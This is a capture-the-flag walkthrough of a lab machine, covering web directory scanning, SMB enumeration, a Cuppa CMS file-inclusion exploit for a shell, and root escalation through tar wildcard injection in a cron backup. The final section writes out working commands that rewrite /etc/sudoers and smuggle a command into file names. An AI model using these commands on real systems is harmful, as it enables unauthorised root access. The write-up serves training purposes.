1.Scanning
The result is 6 services one of them port 80 (http):
When we found website, we check for directories by using any dirb tool
For example, gobuster
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.6.128/
# dir for directory, -w for wordlists, -u for URL
We found a directory called /squirrelmail and when we open it we will see a login page, then we stop because we don’t have any credentials.
2.Enumeration
The Nmap scan was include samba service so we should try to enumerate it using any tool like smbclient or smbmap, etc.. personal use I prefer smbclient so I used it
Anonymous. is folder able to read by anyone and other folders are need permissions
We notice there’s file called attention.txt and folder called logs.
The logs are including important information always so you have to check it every time
We had read the files and saw that attention is an important message tells that every user needs to change their passwords. we open the log and try to use last password was used and it’s first one
We used username milesdyson and password from logs. Then we notice important title (samba password reset)
we open it and see it’s included new password for the samba to connect mile’s files using smbclient
We notice folder called notes, we open it and get note called important
First note is (CMS directory) and it’s URL. When we open it in browser it showing us this page:
As I said at first, we use gobuster every time to locate folders
We found an administrator page.
when we navigate to it we notice the server that are running , it’s called cuppa
3.Exploit
we use searchsploit to find an exploit for it
we found one! and its txt. The exploit says that alertconfigfield.php is vulnerable and we can execute it. we have to add this to URL to get shell
By using netcat we will get initial shell.
We navigate for user folder and we notice interesting thing.
Backup folder and always backup folders are in crontab so that’s mean the commands in backup file are execute every few minutes
We can use it to get privilege escalation
4.Privilege Escalation
The backup is backed up everything in /var/www/html so we have to navigate to this folder first
Then we use the exploit of wildcard injection by using these commands
echo ‘echo “www-data ALL=(root) NOPASSWD: ALL” > /etc/sudoers’ > mf13.sh
#this command will change permission of www-data user by add it to sudoers and named file as mf13
echo “/var/www/html” > “ — checkpoint-action=exec=sh mf13.sh”
echo “/var/www/html” > — checkpoint=1
these commands will make us able to use sudo command without password. and by this we got privilege escalation
also, we can use Metasploit for privilege escalation by using (post/multi/recon/local_exploit_suggester)
Written By MF-13 (eng.saif@protonmail.com)
